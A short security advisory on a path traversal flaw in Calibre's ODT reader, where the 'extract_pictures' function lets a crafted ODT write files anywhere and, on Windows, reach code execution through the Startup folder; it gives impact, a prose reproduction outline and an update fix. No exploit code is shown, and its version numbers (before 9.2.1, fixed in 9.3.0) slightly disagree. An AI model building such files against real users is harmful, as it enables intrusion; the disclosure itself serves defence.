Calibre Path Traversal Vulnerability in ODT Reader Allowing Arbitrary File Write and Remote Code Execution

A path traversal vulnerability has been identified in Calibre's ODT reader, specifically in versions prior to 9.2.1. This vulnerability allows arbitrary file writes to any location where the user has write permissions. On Windows systems, this can lead to remote code execution by writing a malicious payload to the Startup folder, which is executed during the next login. The issue arises because the 'extract_pictures' function only verifies the beginning of file names and fails to properly sanitize '..' sequences. While Calibre's built-in ZipFile.extractall() method does sanitize paths, the 'extract_pictures' function circumvents this protection by manually reading files and writing them to disk.

Impact

Exploitation of this vulnerability allows for arbitrary file writes, with the potential for remote code execution on Windows systems by placing a payload in the Startup folder.

Reproduction

The vulnerability can be reproduced by converting a malicious ODT file, which is essentially a ZIP archive, using Calibre's GUI. The ODT file must contain a path traversal payload that exploits the 'extract_pictures' function's lack of proper filename sanitization. Once the file is converted, the payload will execute the next time the user logs into Windows.

Remediation

Users can update to Calibre version 9.3.0 or later, where this vulnerability has been fixed.